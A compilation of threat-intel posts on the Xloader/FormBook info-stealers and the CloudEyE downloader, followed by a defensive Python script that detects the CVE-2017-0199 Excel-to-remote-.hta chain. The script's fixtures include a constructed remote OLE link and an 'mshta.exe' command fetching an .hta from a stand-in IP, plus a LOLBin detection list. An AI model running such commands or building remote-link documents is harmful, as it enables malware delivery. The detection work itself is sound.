📢 Xloader v8.1+: new obfuscation techniques and C2 protocol detailed
📝 ## 🔍 Context

Published on 31 March 2026 by ThreatLabz (Zscaler), this article is an in-depth technical analysis...
📖 cyberveille: https://cyberveille.ch/posts/2026-04-05-xloader-v8-1-nouvelles-techniques-d-obfuscation-et-protocole-c2-detailles/
🌐 source: https://www.zscaler.com/blogs/security-research/latest-xloader-obfuscation-methods-and-network-protocol
#C2_protocol #FormBook #Cyberveille

Latest Xloader Obfuscation Methods and Network Protocol

Xloader is an information-stealing malware family that evolved from Formbook and targets web browsers, email clients, and File Transfer Protocol (FTP) applications. Additionally, Xloader may execute arbitrary commands and download second-stage payloads on an infected system. The author of Xloader continues to update the codebase, with the most recent observed version being 8.7. Since version 8.1, the Xloader developer has applied several changes to the code obfuscation. The purpose of this blog is to describe the latest obfuscation methods and provide an in-depth analysis of the network communication protocol. We highly recommend reading our previous blogs about Xloader in order to get a better understanding of the malware’s internals.

Pulse ID: 69cd1af8a479e588f60bb052
Pulse Link: https://otx.alienvault.com/pulse/69cd1af8a479e588f60bb052
Pulse Author: AlienVault
Created: 2026-04-01 13:17:44

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CyberSecurity #Email #FormBook #InfoSec #Malware #OTX #OpenThreatExchange #XLoader #bot #AlienVault

In H2 2025, #ESETresearch saw a thirtyfold increase in #CloudEyE detections, amounting to more than 100,000 hits over the course of six months. CloudEyE is a #MaaS downloader and cryptor used to conceal and deploy other malware, such as #Rescoms, #Formbook, and #AgentTesla.
CloudEyE’s initial stage is a downloader that spreads via #PowerShell scripts, #JavaScript files, and #NSIS executables. These download the next stage, the cryptor component, with the final payload packed within. All of the CloudEyE stages are heavily obfuscated.
Most of the CloudEyE attack attempts we registered in H2 2025 targeted Poland (32%). These attacks were part of a wave of email campaigns in Central and Eastern Europe that ESET observed in September and October 2025.
In order to appear legitimate, the emails used in the campaign were often sent from compromised legitimate accounts and localized to the language of the targeted country. They were usually inquiries about invoice payments, package tracking, and purchase orders.
For further information on CloudEyE, cryptors, and more, head on over to the latest #ESETThreatReport: https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h22025.pdf
🚨 FormBook malware spreads via fake installers A new FormBook wave uses weaponized PDFs and spoofed software installers to steal passwords, browser data, keystrokes and screenshots while dropping secondary payloads. Targets include small firms and home users. #ransomNews #FormBook #malware
🚨 Intercontinental cyberattack with Formbook: ComicForm and SectorJ149 have been targeting industrial and financial companies since April 2025. Sophisticated phishing, obfuscation and exfiltration of sensitive data. Protect yourself with training, EDR and network segmentation. #Cybersécurité #Formbook #Cyberattaque #LynxIntel https://lynxintel.io/cyberattaque-intercontinentale-avec-formbook-les-groupes-en-pleine-action/
2025-08-11 (Monday): Quick post of an #XLoader ( #Formbook ) infection, with a #pcap, email, and #malware sample available at https://www.malware-traffic-analysis.net/2025/08/11/index.html

🎯 Registry abuse helps #malware maintain persistence on infected endpoints. By detonating files in #ANYRUN Sandbox, analysts gain instant threat visibility to accelerate investigations and response.

👨‍💻 See #FormBook and script-based attacks analysis: https://any.run/cybersecurity-blog/how-to-spot-malware-registry-abuse/?utm_source=mastodon&utm_medium=post&utm_campaign=registry_abuse&utm_term=070825&utm_content=linktoblog

#cybersecurity #infosec

Top 10 threats of last week by sandbox uploads 🌐 (the previous week's count is in parentheses; the arrow marks the change)
⬆️ #Lumma 548 (484)
⬇️ #Neconyd 289 (311)
⬇️ #Asyncrat 244 (300)
⬇️ #Snake 237 (262)
⬇️ #Remcos 190 (468)
⬇️ #Xworm 179 (214)
⬇️ #Agenttesla 168 (174)
⬆️ #Lokibot 154 (145)
⬇️ #Amadey 144 (157)
⬇️ #Formbook 128 (139)
Track them all: https://any.run/malware-trends/?utm_source=mastodon&utm_medium=post&utm_campaign=top_ten&utm_content=tracker&utm_term=300625

🎯 Registry abuse helps #malware maintain persistence and stealth on infected endpoints.
Detonating suspicious files in #ANYRUN Sandbox gives instant visibility into registry activity.

Explore examples, featuring #FormBook and script-based attacks 👇
https://any.run/cybersecurity-blog/how-to-spot-malware-registry-abuse/?utm_source=mastodon&utm_medium=post&utm_campaign=spot_registry_abuse&utm_term=240625&utm_content=linktoblog

#cybersecurity #infosec


🚨 0-day vibes from 2017? Yup, it’s still happening.

A malicious Excel file using CVE-2017-0199 is out here in 2025 dropping FormBook like it's a fresh mixtape.

The attack chain?

  • Macro-free Excel
  • Weaponized with remote .hta
  • Payload: Info-stealer FormBook

Despite being 7+ years old, this vuln still slaps in phishing campaigns — because patching is apparently a myth.

Full technical breakdown by @FortiGuardLabs: https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload

TL;DR for blue teamers:

  • Watch your egress traffic
  • Harden Office apps
  • Monitor LOLBins (Living Off the Land Binaries)
  • Block outbound to shady IPs faster than your memes go viral

Don’t let your org get dunked on by a 2017 CVE in 2025. That’s not a good look.

#CyberSecurity #ThreatIntel #FormBook #CVE20170199 #Infosec #BlueTeam #MalwareAnalysis #HackerNews #Phishing
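As an added example (not code from Fortinet, ANY.RUN or the post above), the chain described there can be caught at two layers: statically, by scanning the OOXML package for an External relationship that pulls a remote script (the macro-free Excel file carrying a remote .hta link), and at runtime, by flagging an Office process that spawns a LOLBin such as mshta.exe (the "monitor LOLBins" item in the TL;DR). The static scan generalises beyond .hta to any remote script or executable target, and beyond Excel to any OOXML container. The workbook and the process events are constructed inline for the example; the event field names (`parent_image`, `image`, `command_line`) and the address 198.51.100.7 (a documentation range) are assumptions, not indicators from the Fortinet write-up.

```python
"""Two checks for the CVE-2017-0199 style chain in the post above (macro-free
Excel -> remote .hta -> FormBook). Added example, not Fortinet's or ANY.RUN's
code; the sample workbook, the event field names and the IP are assumptions."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Targets a document should never fetch from a remote host through an object link.
SUSPICIOUS_EXT = re.compile(r"\.(hta|rtf|docx?|docm|vbs|js|ps1|exe|dll|scr)$", re.I)


def find_remote_links(ooxml_bytes):
    """Scan every .rels part of an OOXML package (docx/xlsx/pptx are all zips) and
    return External relationships whose target is a remote URL ending in a script
    or executable extension: the static fingerprint of a remote object link."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode") != "External":
                    continue  # internal parts are ordinary package plumbing
                target = rel.get("Target", "")
                url = urlparse(target)
                if url.scheme.lower() in ("http", "https", "ftp", "file") \
                        and SUSPICIOUS_EXT.search(url.path):
                    hits.append({"part": name,
                                 "type": rel.get("Type", "").rsplit("/", 1)[-1],
                                 "target": target})
    return hits


def build_sample_workbook():
    """Constructed minimal package (not a real sample): one sheet whose relationships
    carry a benign external hyperlink and a remote OLE object link to an .hta."""
    parts = {
        "_rels/.rels":
            f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
            f'Type="{OFFICE_REL}officeDocument" Target="xl/workbook.xml"/></Relationships>',
        "xl/workbook.xml": "<workbook/>",
        "xl/worksheets/sheet1.xml": "<worksheet/>",
        "xl/worksheets/_rels/sheet1.xml.rels":
            f'<Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{OFFICE_REL}hyperlink" '
            f'Target="https://example.com/" TargetMode="External"/>'
            f'<Relationship Id="rId2" Type="{OFFICE_REL}oleObject" '
            f'Target="http://198.51.100.7/update.hta" TargetMode="External"/>'
            f'</Relationships>',
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}


def office_spawned_lolbins(events):
    """Flag process-creation events (Sysmon Event ID 1 shape, field names assumed)
    where an Office application is the direct parent of a LOLBin; this is the
    runtime fingerprint of the chain once the remote .hta has been fetched."""
    flagged = []
    for ev in events:
        parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
        child = ev["image"].rsplit("\\", 1)[-1].lower()
        if parent in OFFICE_APPS and child in LOLBINS:
            reason = f"{parent} spawned {child}"
            if re.search(r"https?://", ev.get("command_line", ""), re.I):
                reason += " with a remote URL on the command line"
            flagged.append({**ev, "reason": reason})
    return flagged


SAMPLE_EVENTS = [  # constructed telemetry, not from a real host
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://198.51.100.7/update.hta"},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "command_line": "splwow64.exe 12288"},  # normal print helper, must not fire
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c dir"},  # LOLBin, but not Office-parented
]

if __name__ == "__main__":
    for hit in find_remote_links(build_sample_workbook()):
        print("document:", hit)
    for ev in office_spawned_lolbins(SAMPLE_EVENTS):
        print("endpoint:", ev["reason"])
```

Two caveats a practitioner should keep in mind: the static scan only covers zip-based OOXML, so the original RTF delivery of CVE-2017-0199 would need a separate check for OLE link objects in RTF, and in some environments Office legitimately launches cmd.exe or msiexec.exe, so the parent/child rule needs a site-specific allowlist before it becomes an alert rather than a hunt query.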